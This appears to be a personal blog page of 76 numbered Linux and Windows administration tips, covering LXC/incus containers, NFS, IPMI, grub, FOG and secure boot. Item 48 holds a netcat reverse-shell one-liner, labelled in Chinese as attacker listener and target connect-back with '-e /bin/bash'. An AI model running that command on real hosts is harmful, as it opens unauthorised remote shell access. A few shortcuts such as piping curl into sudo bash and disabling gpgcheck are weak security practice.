LinuxTips16

TurnToJPG -->


1. ArchLinux ctg items

Install nomachine:

$ export https_proxy=http://192.168.1.194:10809
$ export http_proxy=http://192.168.1.194:10809
$ yay  --sudoflags="http_proxy=http://192.168.1.194:10809 https_proxy=http://192.168.1.194:10809" nomachine

Configure auto-login refers to 2021-06-15-iPadiPhoneMirroringDisplay.md

connecting to :

/images/2023_11_27_11_40_04_660x179.jpg

2. conda deactivate base

via:

conda config --set auto_activate_base false

Doing this could let python to be set to system default.

$ which python3
/usr/bin/python3

3. lxc with nvidia support

Start a lxc instance via:

$ sudo lxc launch images:ubuntu/jammy lxcnvidia
Creating lxcnvidia
Starting lxcnvidia                        
$ sudo lxc config set lxcnvidia nvidia.driver.capabilities=all
$ sudo lxc config show lxcnvidia  | grep nvidia
  nvidia.driver.capabilities: all

Configure in lxc instance:

$ sudo lxc exec lxcnvidia bash
root@lxcnvidia:~# 

4. lxc with nvidia(correct way)

Steps:

lxc launch ubuntu:18.04 cuda -c nvidia.runtime=true
lxc config device add cuda gpu gpu
lxc exec cuda -- nvidia-smi

5. lxc add second nic(macvlan)

Create a new profile:

$ cat macvlan
config: {}
description: Default LXD profile modified for using macvlan
devices:
  eth1:
    nictype: macvlan
    parent: enp3s0 
    type: nic
name: macvlan

Create this new profile:

# lxc profile edit macvlan<macvlan
# lxc config edit cuda
    profiles:
    - default
+++    - macvlan
# lxc restart cuda
# lxc exec cuda bash
dhclient eth1

Then you got the address.

Start the ui:

dash@cuda:~/webui$ ./webui.sh 

################################################################
Install script for stable-diffusion + Web UI
Tested on Debian 11 (Bullseye)
################################################################

Should change its listening address to 0.0.0.0

6. lxc on ubuntu22.04

not started, solved via:

GRUB_CMDLINE_LINUX_DEFAULT="quiet splash systemd.unified_cgroup_hierarchy=false"

7. ipmi set address

set bmc port’s ip address to 192.168.2.167, gateway 192.168.2.1 via:

 ipmitool lan set 1 ipsrc static
 ipmitool lan set 1 ipaddr 192.168.2.167
 ipmitool lan set 1 defgw ipaddr 192.168.2.1
 ipmitool lan print 1

8. apt-cache policy alternative

in yum, via:

yum --showduplicates list 

9. cut video using ffmpeg

cut unnecessary part and combine then again:

$ ffmpeg -ss 00:00:06 -t 00:03:43 -i SLXC-2023-12-08_11.25.03.mp4 -vcodec copy -acodec copy split1.mp4
$ ffmpeg -ss 00:05:55 -t 00:09:00 -i SLXC-2023-12-08_11.25.03.mp4 -vcodec copy -acodec copy split2.mp4
$ ffmpeg -ss 00:15:46 -t 00:00:35 -i SLXC-2023-12-08_11.25.03.mp4 -vcodec copy -acodec copy split3.mp4
$ vim list.txt
file ./split1.mp4
file ./split2.mp4
file ./split3.mp4
$ ffmpeg -f concat -safe 0 -i list.txt -c:v copy vdiidvRONG.mp4

10. NFS server(ubuntu22.04)

Steps:

sudo apt update
sudo apt install nfs-kernel-server
sudo mkdir -p /mnt/nfs_share
sudo chown -R nobody:nogroup /mnt/nfs_share/
sudo chmod 777 /mnt/nfs_share/
sudo nano /etc/exports
/mnt/nfs_share 192.168.1.1/24(rw,sync,no_subtree_check)
sudo exportfs -a
sudo systemctl restart nfs-kernel-server
sudo systemctl enable nfs-kernel-server

mount via:

sudo mount -t nfs 192.168.1.194:/mnt/nfs_share /mnt

11. install casaos

via:

curl -fsSL https://get.casaos.io | sudo bash

12. rst2html issue

Solved via:

apt-get install python3-docutils

13. redroid and webui

via:

docker run -itd --privileged -v /root/scrcpy-web/data:/data --name scrcpy-web -p 48000:8000/tcp --link redroid12:myphone1 emptysuns/scrcpy-web:v0.1
docker run -itd --name redroid12  --privileged -p 5555:5555 redroid12:latest androidboot.use_memfd=1

Should re-write using docker-compose.

14. ubuntu2204 docker issue

solved via:

vagrant@vagrant:~$ sudo update-alternatives --config iptables
There are 2 choices for the alternative iptables (providing /usr/sbin/iptables).

  Selection    Path                       Priority   Status
------------------------------------------------------------
* 0            /usr/sbin/iptables-nft      20        auto mode
  1            /usr/sbin/iptables-legacy   10        manual mode
  2            /usr/sbin/iptables-nft      20        manual mode

Press <enter> to keep the current choice[*], or type selection number: 1
update-alternatives: using /usr/sbin/iptables-legacy to provide /usr/sbin/iptables (iptables) in manual mode
vagrant@vagrant:~$ sudo update-alternatives --config ip6tables
There are 2 choices for the alternative ip6tables (providing /usr/sbin/ip6tables).

  Selection    Path                        Priority   Status
------------------------------------------------------------
* 0            /usr/sbin/ip6tables-nft      20        auto mode
  1            /usr/sbin/ip6tables-legacy   10        manual mode
  2            /usr/sbin/ip6tables-nft      20        manual mode

Then restart docker systemd service.

15. build kernel time

in i7-1165g7, build 6.1.x kernel time:

$ time sh -c 'make -j8 && make modules -j8 && sudo make install && sudo make modules_install '
......

real	28m34.866s
user	138m28.034s
sys	10m21.570s

16. apt force overwrite

via:

sudo apt-get -o Dpkg::Options::="--force-overwrite

17. vbox issue

via:

 sudo groupadd vboxusers
Then add the current user to the above group:

$ sudo usermod -a -G vboxusers sk
Replace sk with your current username.

Check if the user is added to the group:

$ grep vboxusers /etc/group
vboxusers:x:1001:sk
Yes, the user sk has been added to vboxusers' group.

Finally, restart the virtualbox kernel module using command:

$ sudo /sbin/vboxconfig

18. libvirtd nvram privilege issue

/var/lib/libvirt/qemu/nvram/win11_VARS.fd': Permission denied, solved via:

1. Add the following lines to the end of /etc/apparmor.d/abstractions/libvirt-qemu

/var/lib/libvirt/qemu/nvram/* rwk,
/sys/kernel/mm/transparent_hugepage/enabled r,
/usr/share/OVMF/OVMF_CODE_4M.secboot.fd rk,
/run/libvirt/qemu/swtpm/* rwk,

2. Reload apparmor, restart libvirtd:

sudo systemctl reload apparmor.service
sudo systemctl restart libvirtd

19. nvflash download

nvflash is used for dumping out the nvidia video flash, download it from https://www.techpowerup.com/download/nvidia-nvflash/

20. totally blacklist i915

via:

$ sudo vim /etc/modprobe.d/blacklist.conf
blacklist.conf
blacklist snd_hda_intel
blacklist snd_hda_codec_hdmi
blacklist i915
$ sudo update-initramfs -u -k all

21. activate the pvs and mount

solved via:

vgchange -ay
mkdir -p /mnt8
mount /dev/mapper/pve-root /mnt8

22. build celanda docker

sudo docker run -it ubuntu:18.04 /bin/bash, then in docker instance for doing following steps:

apt update -y
apt install -y build-essential git git-lfs
apt install -y python-six
apt install -y wget curl
ln -sf /usr/bin/python3 /usr/bin/python
apt install -y iotop htop nethogs python-pystache python3-pystache
scp dash@192.168.1.45:~/.bin/repo .
cp repo /bin/
cp repo /usr/bin/repo

Commit the docker instance:

$ sudo docker commit a3e139322b90 buildceladon:latest

23. ipmi reset in system

ipmi cold reset in system .

# ipmitool bmc reset cold
Sent cold reset command to MC

24. nvidia conflict driver

error messages:

dpkg: error processing archive /var/cache/apt/archives/nvidia-kernel-common-535_535.161.07-0ubuntu1_amd64.deb (--unpack):
 trying to overwrite '/lib/firmware/nvidia/535.161.07/gsp_ga10x.bin', which is also in package nvidia-firmware-535-535.161.07 535.161.07-0ubuntu0.22.04.1
dpkg-deb: error: paste subprocess was killed by signal (Broken pipe)
Errors were encountered while processing:
 /var/cache/apt/archives/nvidia-kernel-common-535_535.161.07-0ubuntu1_amd64.deb

solved via:

sudo dpkg -i --force-all /var/cache/apt/archives/nvidia-kernel-common-535_535.161.07-0ubuntu1_amd64.deb
sudo apt --fix-broken install

25. cpupower

Install:

sudo apt install -y linux-tools-common
sudo apt install -y linux-tools-generic
sudo apt install -y linux-tools-6.5.0-25-generic

with linux-tools-common you will also have the turbostat for viewing the power consumption.

26. s-tui

Install via apt install -y s-tui.

/images/2024_03_15_22_36_02_938x971.jpg

27. cpupower

Set default grub items:

GRUB_CMDLINE_LINUX_DEFAULT="quiet splash amd_pstate=guided"

then check the governer:

$ cpupower frequency-info 
...
  available cpufreq governors: conservative ondemand userspace powersave performance schedutil
...

set to ondemand:

sudo cpupower frequency-set -g ondemand

28. show htop on ssh

via:

ssh user@test.home -t 'htop'

29. quickly pip

via:

pip install xxxx -i https://pypi.mirrors.ustc.edu.cn/simple/

30 . git lfs

If git won’t call git-lfs for downloading big files, install:

git lfs install

resulting in:

$ cat ~/.gitconfig 
[filter "lfs"]
	smudge = git-lfs smudge -- %f
	process = git-lfs filter-process
	required = true
	clean = git-lfs clean -- %f

31. update multiple gcc selection

Steps:

sudo update-alternatives --remove-all gcc 
sudo update-alternatives --remove-all g++
sudo apt install gcc-11 gcc-12 g++-11 g++-12
sudo update-alternatives --install /usr/bin/gcc gcc /usr/bin/gcc-11 10
sudo update-alternatives --install /usr/bin/gcc gcc /usr/bin/gcc-12 20

sudo update-alternatives --install /usr/bin/g++ g++ /usr/bin/g++-11 10
sudo update-alternatives --install /usr/bin/g++ g++ /usr/bin/g++-12 20

sudo update-alternatives --install /usr/bin/cc cc /usr/bin/gcc 30
sudo update-alternatives --set cc /usr/bin/gcc

sudo update-alternatives --install /usr/bin/c++ c++ /usr/bin/g++ 30
sudo update-alternatives --set c++ /usr/bin/g++

Select default items:

sudo update-alternatives --config gcc
sudo update-alternatives --config g++

32. speedup disk

via disable fstrim on ubuntu:

sudo systemctl disable fstrim.timer

33. github actions update

purplepalmdash/purplepalmdash.github.io's Deploy keys, add the new deploy keys:

/images/2024_04_07_11_03_45_478x133.jpg

purplepalmdash/blogsource's Settings-> Secrets and variables -> Actions, add a new ACTIONS_DEPLOY_KEY:

/images/2024_04_07_11_04_56_970x148.jpg

The first picture contains content from id_ed25519.pub, while the second is id_ed25519, which are generated via ssh-keygen -t ed25519 -C "xxxxxx@gmail.com".

Change the file:

$ cat .github/workflows/main.yml
......

     - name: Deploy
        uses: peaceiris/actions-gh-pages@v3
        with:
          deploy_key: ${{ secrets.ACTIONS_DEPLOY_KEY }}
          external_repository: purplepalmdash/purplepalmdash.github.io
          publish_dir: ./src/public
          publish_branch: master

34. wake-on-lan configuration

Enable wake on lan for linux configuration, and make it permanently:

test@2204:~$ sudo vim  /etc/systemd/system/wol.service 
test@2204:~$ sudo systemctl daemon-reload
test@2204:~$ sudo systemctl enable wol.service
Created symlink /etc/systemd/system/basic.target.wants/wol.service → /etc/systemd/system/wol.service.
test@2204:~$ cat /etc/systemd/system/wol.service
[Unit]
Description=Enable Wake On Lan

[Service]
Type=oneshot
ExecStart = /sbin/ethtool --change enp1s0 wol g

[Install]
WantedBy=basic.target
test@2204:~$ /sbin/ethtool --change enp1s0 wol g
netlink error: Operation not permitted
test@2204:~$ sudo /sbin/ethtool --change enp1s0 wol g
test@2204:~$ sudo ethtool enp1s0 | grep Wake
	Supports Wake-on: pumbg
	Wake-on: g
test@2204:~$ sudo shutdown -h now
Connection to 192.168.1.40 closed by remote host.

35. update-grub2 not working for efi

solved via:

grub-install --efi-directory=/boot/efi

36. ipxe bootup issue

let realtek use its own efi file for bootup, solved via:

# vim /etc/dhcp/dhcpd.conf
host st12400 {
                        hardware ethernet 54:f6:c5:1f:23:bd;
                        filename "realtek.efi";
                }
# systemctl restart isc-dhcp-server

37. win11 passwordless login

Login without insert password:

/images/2024_04_12_10_20_49_695x445.jpg

/images/2024_04_12_10_21_12_548x589.jpg

38. change win11 behavior

via:

C:\Users\feipyang>reg add "HKCU\Software\Classes\CLSID\{86ca1aa0-34aa-4e8b-a509-50c905bae2a2}\InprocServer32" /f /ve
操作成功完成。

C:\Users\feipyang>taskkill /f /im explorer.exe & start explorer.exe
成功: 已终止进程 "explorer.exe",其 PID 为 10536。

39. 7z extract files

via:

7za x xxxx.7z

40. ast resolution

ast resolution:

xrandr --newmode "1440x900_59.90"  106.29  1440 1520 1672 1904  900 901 904 932  -HSync +Vsync
xrandr --addmode VGA-1 1440x900_59.90

41. win11 passwordless login

Solved via:

按win+R,打开运行,输入Control Userpasswords2,打开用户账户。
用户账户设置.png

打开该设置,取消选中该选项,点击应用,输入想要自动登录的账户和密码,即可开机后自动登录Windows。
若此界面无该选项,按win+R,打开运行,输入regedit,打开注册表修改
路径:计算机\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\PasswordLess\Device
这个路径下的DevicePasswordLessBuildVersion数值从2改成0,再次打开用户账户设置就有选项了。

42. Windows 11 ignore network installation

via:

OOBE\BYPASSNRO 

43. mii-tool for re-negotiate

steps:

root@aiBox:/home/dash# mii-tool enp2s0
enp2s0: negotiated 100baseTx-FD, link ok
root@aiBox:/home/dash# mii-tool -r enp2s0
restarting autonegotiation...
root@aiBox:/home/dash# mii-tool enp2s0
enp2s0: negotiated 1000baseT-FD flow-control, link ok

44 . quickly install linuxloop

Change the content of linuxloop:

chroot_Arch()
{
prepare_bootstrap="
curl -l https://archlinux.org/mirrorlist/?ip_version=4 -o /etc/pacman.d/mirrorlist
sed -i 's@#Server = https://mirrors.ustc.edu.cn@Server = https://mirrors.ustc.edu.cn@g' /etc/pacman.d/mirrorlist
pacman -Syu --noconfirm --needed bash bash-completion btrfs-progs bzip2 ca-certificates coreutils cryptsetup curl dosfstools e2fsprogs efibootmgr gzip lsof nano openssl reflector sudo strace tar util-linux xz zstd
"

cat >"${linuxloopsdir}"/chroot/bootstrap/linuxloops/prepare_chroot <<PREPARE_CHROOT
#!/bin/bash
set -e
#reflector --latest 10 --threads 10 --connection-timeout 1 --download-timeout 1 --protocol https --completion-percent 90 --sort rate --save /etc/pacman.d/mirrorlist --verbose
echo 'Server = http://mirrors.ustc.edu.cn/archlinux/\$repo/os/\$arch'>/etc/pacman.d/mirrorlist
cat /etc/pacman.d/mirrorlist
pacstrap -G /mnt base base-devel
PREPARE_CHROOT
chmod 0755 "${linuxloopsdir}"/chroot/bootstrap/linuxloops/prepare_chroot

Host’s /etc/resolv.conf should be set to nameserver 223.5.5.5.
Install via:

test@vhdboot:~$ sudo bash ~/linuxloops -distro Arch -env None -dst /home/test/arch.img -s 30 
menuentry 'Arch' --class 'arch' {
	rmmod tpm
	img_path="/home/test/arch.img"
	img_uuid="6ab60fa1-d874-4b84-99d9-8ac0230f0303"
	search --no-floppy --set=root --file "${img_path}"
	loopback loop "${img_path}"
	linuxloops_args="rdinit=/linuxloops img_path=${img_path} img_uuid=${img_uuid}"
	export linuxloops_args
	if [ -f (loop,2)/grub2/grub.cfg ]; then
		configfile (loop,2)/grub2/grub.cfg
	else
		configfile (loop,2)/grub/grub.cfg
	fi
}

45. enable detect os

enable os-probe:

$ sudo vim /etc/default/grub
GRUB_DISABLE_OS_PROBER=false
$ sudo update-grub2

46. disable netbootxyz

via:

dash@ai:~/Code/netboot.xyz$ cd ~/containerdata-public/docker/netbootxyz/
dash@ai:~/containerdata-public/docker/netbootxyz$ ls
assets  config  docker-compose.yml  docker-compose.yml~  readme.md
dash@ai:~/containerdata-public/docker/netbootxyz$ sudo docker-compose down
Stopping netbootxyz ... done
Removing netbootxyz ... done
Removing network netbootxyz_default

47. tio(replace minicom)

via:

sudo pacman -S tio
sudo tio /dev/ttyUSB0
sudo tio --baudrate 115200 --databits 8 --flow none --stopbits 1 --parity none /dev/ttyUSB0

48. nc tips

via:

攻击机开启本地监听:

netcat -lvvp 2333
目标机主动连接攻击机:

netcat 47.xxx.xxx.72 2333 -e /bin/bash
# nc <攻击机IP> <攻击机监听的端口> -e /bin/bash

49 rtl 8111/8168 driver

Install driver for enable WOL:

/images/2024_04_30_11_42_39_716x493.jpg

/images/2024_04_30_11_43_28_466x576.jpg

50. copy files into qcow2

Using following commands for copying files into qcow2. thus we could start the corresonding vm.

sudo modprobe nbd max_part=8
sudo qemu-nbd --connect=/dev/nbd0 /media/sda/images/0000_win10vhd.qcow2 
sudo mount /dev/nbd0p2  /mnt8
sudo cp /media/sda/images/win11.vhdx /mnt8 && sudo sync
sudo umount /mnt8
sudo qemu-nbd --disconnect /dev/nbd0
sudo rmmod nbd

51. lxc download speedup

via specify the mirror site:

sudo lxc-create -n debian12 -t download -- --server mirrors.tuna.tsinghua.edu.cn/lxc-images -r bookworm

or specify another mirror:

mirrors.sdu.edu.cn/lxc-images

52. incus tips for fog

tips:

# 80(webadmin) port forwarding:    
incus config device add fogincuschinese myport80 proxy listen=tcp:0.0.0.0:80 connect=tcp:127.0.0.1:80
# 69(tftp) port(udp and tcp):    
incus config device add fogincuschinese myport69 proxy listen=tcp:0.0.0.0:69 connect=tcp:127.0.0.1:69
incus config device add fogincuschinese myport69udp proxy listen=udp:0.0.0.0:69 connect=udp:127.0.0.1:69
# 2049(nfs) port (udp and tcp):    
incus config device add fogincuschinese myport2049 proxy listen=tcp:0.0.0.0:2049 connect=tcp:127.0.0.1:2049
incus config device add fogincuschinese myport2049udp proxy listen=udp:0.0.0.0:2049 connect=udp:127.0.0.1:2049
# 111(portmap) port (udp and tcp):
incus config device add fogincuschinese myport111 proxy listen=tcp:0.0.0.0:111 connect=tcp:127.0.0.1:111
incus config device add fogincuschinese myport111udp proxy listen=udp:0.0.0.0:111 connect=udp:127.0.0.1:111
# 67(dhcp) port (udp and tcp):, dhcp should not be configured
incus config device add fogincuschinese myport67 proxy listen=tcp:0.0.0.0:67 connect=tcp:127.0.0.1:67
incus config device add fogincuschinese myport67udp proxy listen=udp:0.0.0.0:67 connect=udp:127.0.0.1:67

53. incus network create

via:

incus network create foo ipv4.dhcp=false ipv6.dhcp=false ipv4.address=10.147.148.1/24

54. incus macvlan create

via:

# incus network create incusbr0 --type=macvlan parent=enp7s0
# incus network list
+----------+----------+---------+------+------+-------------+---------+---------+
|   NAME   |   TYPE   | MANAGED | IPV4 | IPV6 | DESCRIPTION | USED BY |  STATE  |
+----------+----------+---------+------+------+-------------+---------+---------+
| enp7s0   | physical | NO      |      |      |             | 1       |         |
+----------+----------+---------+------+------+-------------+---------+---------+
| incusbr0 | macvlan  | YES     |      |      |             | 0       | CREATED |
+----------+----------+---------+------+------+-------------+---------+---------+

55. incus instance network

via:

# cat /etc/systemd/network/eth0.network 
[Match]
Name=eth0

[Network]
Address=10.17.18.34/24
Gateway=10.17.18.1
DNS=223.5.5.5

56. hide partition

do:


HKEY_LOCAL_MACHINE\SYSTEM\MountedDevices
前面加#就隐藏
#\DosDevices\D:
重启就能看到效果。

这个安装器可隐藏指定区 http://bbs.wuyou.net/forum.php?m ... 466&ordertype=1

57. add user into sudo

via:

usermod -aG sudo xxx

58. disable debian grub picture

via:

mv /usr/share/images/desktop-base/desktop-grub.png /usr/share/images/desktop-base/desktop-grub.png.bak

Edit the configuration of grub:

GRUB_DEFAULT="Ventoy"
GRUB_TIMEOUT_STYLE=hidden
GRUB_TIMEOUT=1
GRUB_DISTRIBUTOR=`lsb_release -i -s 2> /dev/null || echo Debian`
GRUB_CMDLINE_LINUX_DEFAULT="quiet"
GRUB_CMDLINE_LINUX=""

59. blissos16 in linuxloop

via:

sudo bash ~/linuxloopandroid -distro BlissOS -env 16/Gapps/Generic -dst /media/ntfs/linuxHHH/bliss16.img -s 40

60. Automatically gpt/mbr/fix

gpt->mbr via:

dash@ai:/media/sda/qcow2$ printf "r\ng\nw\nY\n"  | sudo gdisk /dev/nbd0
GPT fdisk (gdisk) version 1.0.8

Partition table scan:
  MBR: protective
  BSD: not present
  APM: not present
  GPT: present

Found valid GPT with protective MBR; using GPT.

Command (? for help): 
Recovery/transformation command (? for help): 
MBR command (? for help): 
Converted 4 partitions. Finalize and exit? (Y/N): GPT data structures destroyed! You may now partition the disk using fdisk or
other utilities.
dash@ai:/media/sda/qcow2$ sudo fdisk -l /dev/nbd0
Disk /dev/nbd0:80 GiB,85899345920 字节,167772160 个扇区
单元:扇区 / 1 * 512 = 512 字节
扇区大小(逻辑/物理):512 字节 / 512 字节
I/O 大小(最小/最佳):512 字节 / 512 字节
磁盘标签类型:dos
磁盘标识符:0x00000000

设备        启动      起点      末尾      扇区  大小 Id 类型
/dev/nbd0p1           2048    206847    204800  100M ef EFI (FAT-12/16/32)
/dev/nbd0p2         206848    239615     32768   16M  c W95 FAT32 (LBA)
/dev/nbd0p3         239616 166560255 166320640 79.3G  7 HPFS/NTFS/exFAT
/dev/nbd0p4      166560256 167770623   1210368  591M 27 隐藏的 NTFS WinRE

Then mark /dev/nbd0p3 as bootable:

Whole scripts:

convert_to_mbr.sh
sudo qemu-nbd --connect=/dev/nbd0 /media/sda/qcow2/winuefi_to_mbr.qcow2 
echo "############### 0. Show origin items"
sudo fdisk -l
sleep 3
echo "############### 1. Convert from gpt to mbr"
printf "r\ng\nw\nY\n"  | sudo gdisk /dev/nbd0
echo "############### 2. Set bootable flag to disk"
printf "a\n3\nw\n"  | sudo fdisk /dev/nbd0
echo "############### 3. List modified items"
sudo fdisk -l
sudo qemu-nbd --disconnect /dev/nbd0
echo "############### 4. Now start machine for fixing bootable in winPE"

61. Install gnome flashback

via:

$ sudo apt install gnome-session-flashback

62. buildroot chinese

via:

在buildroot目录下运行make menuconfig 命令,在Build options–>Mirrors and Download locations 下设置国内源:

BACKUP_SITE="https://mirrors.lzu.edu.cn/buildroot/"
KERNEL_MIRROR="https://mirror.bjtu.edu.cn/kernel/"
GNU_MIRROR="http://mirrors.nju.edu.cn/gnu/"
LUAROCKS_MIRROR="https://luarocks.cn"
CPAN_MIRROR="http://mirrors.nju.edu.cn/CPAN/"

BACKUP_SITE could adjust to lzu.edu.cn repository

/images/2024_05_20_19_22_20_777x320.jpg

63. xz for initram

xz via following command:

xz -C crc32 -z -c init > init.xz

64. python issue

solved via:

[test@minirocky92 ~]$ python
Python 3.9.16 (main, Dec  8 2022, 00:00:00) 
[GCC 11.3.1 20221121 (Red Hat 11.3.1-4)] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> quit()
[test@minirocky92 ~]$ sudo alternatives --install /usr/bin/python python /usr/bin/python3
python3     python3.11  python3.9   
[test@minirocky92 ~]$ sudo alternatives --install /usr/bin/python python /usr/bin/python3.9 50
[sudo] password for test: 
[test@minirocky92 ~]$ sudo alternatives --install /usr/bin/python python /usr/bin/python3.11 60
[test@minirocky92 ~]$ sudo alternatives --config python

There are 2 programs which provide 'python'.

  Selection    Command
-----------------------------------------------
   1           /usr/bin/python3.9
*+ 2           /usr/bin/python3.11

Enter to keep the current selection[+], or type selection number: 2
[test@minirocky92 ~]$ python
Python 3.11.7 (main, Jan 22 2024, 00:00:00) [GCC 11.4.1 20231218 (Red Hat 11.4.1-3)] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> quit()

64. rocklinux use cd-rom

via:

$ mount iso /mnt8
$ cat /etc/yum.repos.d/local.repo 
[local]
name=local
baseurl=file:///mnt8/BaseOS/
enabled=1
gpgcheck=1
gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-redhat-release
#gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-Rocky-9

[AppStream]
name=AppStream Packages Rocky Linux 9
metadata_expire=-1
gpgcheck=1
enabled=1
baseurl=file:///mnt8/AppStream/
gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-redhat-release
$ yum install -y firefox xorg-x11-xauth

65. fog datebase tips

recording tips:

# mysql -u fogmaster -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 2094
Server version: 10.11.6-MariaDB-0+deb12u1 Debian 12

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> use fog
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [fog]> select * from taskTypes;
......
MariaDB [fog]> update taskTypes set ttKernelArgs='mode=switchsystem nextsystem=fetchvhdwin10' where ttId='32'
    -> ;
Query OK, 1 row affected (0.005 sec)
Rows matched: 1  Changed: 1  Warnings: 0

MariaDB [fog]> update taskTypes set ttKernelArgs='mode=switchsystem nextsystem=downloadvhdwin10' where ttId='33';
Query OK, 1 row affected (0.006 sec)
Rows matched: 1  Changed: 1  Warnings: 0

Insert sentences:

 INSERT INTO taskTypes (ttID, ttName, ttDescription, ttIcon, ttKernel, ttKernelArgs, ttType, ttIsAdvanced, ttIsAccess, ttInitrd) VALUES ('32', 'Fetch Win10', 'Fetch Win10 vhd to nfs server', 'upload', '', 'mode=switchsystem nextsystem=fetchvhdwin10', 'fog', '1', 'both', '');
 INSERT INTO taskTypes (ttID, ttName, ttDescription, ttIcon, ttKernel, ttKernelArgs, ttType, ttIsAdvanced, ttIsAccess, ttInitrd) VALUES ('33', 'Sync Win10', 'Sync Win10 vhd from nfs server', 'download', '', 'mode=switchsystem nextsystem=downloadvhdwin10', 'fog', '1', 'both', '');

66. openeuler repository

via:

[openEuler-everything]
name=openEuler-everything
baseurl=http://repo.huaweicloud.com/openeuler/openEuler-20.03-LTS/everything/x86_64/
enabled=1
gpgcheck=0
gpgkey=http://repo.huaweicloud.com/openeuler/openEuler-20.03-LTS/everything/x86_64/RPM-GPG-KEY-openEuler

[openEuler-EPOL]
name=openEuler-epol
baseurl=http://repo.huaweicloud.com/openeuler/openEuler-20.03-LTS/EPOL/x86_64/
enabled=1
gpgcheck=0

[openEuler-update]
name=openEuler-update
baseurl=http://repo.huaweicloud.com/openeuler/openEuler-20.03-LTS/update/x86_64/
enabled=1
gpgcheck=0

67. openeuler issue

docker will exit in 5 mins:

这个是由于root用户的TMOUT环境变量是300导致,容器300秒后自动停止。
解决:将/etc/bashrc脚本中的最后一行export TMOUT=300注释掉后,停止容器,再重新启动容器,可解决此问题。

68. luks

via:

GRUB_CMDLINE_LINUX="dobtrfs crypt_root=UUID=dc715483-37db-4e5e-bcce-baa845e00a82 root=UUID=e15fb8af-ac6e-4e24-8fb6-195f080fc34b rd.luks.uuid=dc715483-37db-4e5e-bcce-baa845e00a82 rd.luks.key=/keyfile:UUID=e4880a42-fc87-4c3e-bbc5-defdc054e157"

69. genkernel all

missing virtio driver, enable via:

genkernel --virtio all

70. secure boot state

via:

$ mokutil --sb-state
SecureBoot enabled

71. Not enough random bytes

Problem:

Not enough random bytes available.  Please do some other work to give
the OS a chance to collect more entropy! 

solved via:

apt install rng-tools

72. recovery of grub

 mount --types proc /proc /mnt/proc/
 mount --rbind /sys /mnt/sys
 mount --rbind /dev /mnt/dev
 chroot /mnt /bin/bash
root@ubuntu:/# grub-install --target=x86_64-efi --efi-directory=/boot/efi/ --bootloader-id=ubuntu
Installing for x86_64-efi platform.
Installation finished. No error reported.
root@ubuntu:/# exit
exit
 umount -Rl /mnt/{proc,dev,sys,}

73. workingtips on secureboot

sudo apt install -y rng-tools efitools debhelper unzip
scp .../xxx.zip .
unzip xxx.zip
cd xxx
dpkg-buildpackage
apt install grub-efi-amd64 grub-common grub2-common grub-efi-amd64-bin grub-efi-amd64-signed grub-efi-amd64
sudo apt purge shim-signed shim
dpkg -i ubuntu-secure-boot_0.1.2_amd64.deb

74. turn vm into docker

via:

mkdir mnt
sudo mount /dev/mapper/vagrant-root ./mnt
tar -C mnt -czf MyDisk.tar.gz .
docker import MyDisk.tar.gz myimage:1.0

75. remove essential debs

via:

apt-get remove xxxx --allow-remove-essential

76. workingTips On secure

tips:

Preparation for grub make standalone:

root@2204:~#     GPGPUBLICKEY="$(mktemp)"
    GRUBSTAGE="$(mktemp -d)"
    PASSPHRASEFILE="$(mktemp)"
    PEMPRIVATEKEY="$(mktemp)"
root@2204:~# echo $GPGPUBLICKEY $GRUBSTAGE $PASSPHRASEFILE $PEMPRIVATEKEY
/tmp/tmp.aLahqwFjob /tmp/tmp.b2mwtaVeHn /tmp/tmp.EgoKRLWjSU /tmp/tmp.9MIZnHg73k
root@2204:~# EFI_FILENAME=securegrubx64.efi
root@2204:~# BOOTLOADER_ID=ubuntu
root@2204:~# FORMAT=x86_64-efi
root@2204:~# grub_modules="$(ls /usr/lib/grub/x86_64-efi/*.mod | awk -F / '{print $NF}' |  sed 's/\.mod//g')"
root@2204:~# echo $grub_modules
acpi adler32 affs afs afsplitter ahci all_video aout appleldr archelp ata at_keyboard backtrace bfs bitmap bitmap_scale blocklist boot bsd bswap_test btrfs bufio cat cbfs cbls cbmemc cbtable cbtime chain cmdline_cat_test cmp cmp_test configfile cpio_be cpio cpuid crc64 cryptodisk crypto cs5536 ctz_test datehook date datetime diskfilter disk div div_test dm_nv echo efifwsetup efi_gop efinet efi_uga ehci elf eval exfat exfctest ext2 extcmd f2fs fat file fixvideo font fshelp functional_test gcry_arcfour gcry_blowfish gcry_camellia gcry_cast5 gcry_crc gcry_des gcry_dsa gcry_idea gcry_md4 gcry_md5 gcry_rfc2268 gcry_rijndael gcry_rmd160 gcry_rsa gcry_seed gcry_serpent gcry_sha1 gcry_sha256 gcry_sha512 gcry_tiger gcry_twofish gcry_whirlpool geli gettext gfxmenu gfxterm_background gfxterm_menu gfxterm gptsync gzio halt hashsum hdparm hello help hexdump hfs hfspluscomp hfsplus http iorw iso9660 jfs jpeg json keylayouts keystatus ldm legacycfg legacy_password_test linux16 linuxefi linux loadbios loadenv loopback lsacpi lsefimmap lsefi lsefisystab lsmmap ls lspci lssal luks2 luks lvm lzopio macbless macho mdraid09_be mdraid09 mdraid1x memdisk memrw minicmd minix2_be minix2 minix3_be minix3 minix_be minix mmap morse mpi msdospart mul_test multiboot2 multiboot nativedisk net newc nilfs2 normal ntfscomp ntfs odc offsetio ohci part_acorn part_amiga part_apple part_bsd part_dfly part_dvh part_gpt part_msdos part_plan part_sun part_sunpc parttool password password_pbkdf2 pata pbkdf2 pbkdf2_test pcidump pgp play png priority_queue probe procfs progress raid5rec raid6rec random rdmsr read reboot regexp reiserfs relocator romfs scsi search_fs_file search_fs_uuid search_label search serial setjmp setjmp_test setpci sfs shift_test signature_test sleep sleep_test smbios spkmodem squash4 strtoull_test syslinuxcfg tar terminal terminfo test_blockarg testload test testspeed tftp tga time tpm trig tr true udf ufs1_be ufs1 ufs2 uhci usb_keyboard usb usbms usbserial_common usbserial_ftdi usbserial_pl2303 usbserial_usbdebug usbtest video_bochs video_cirrus video_colors 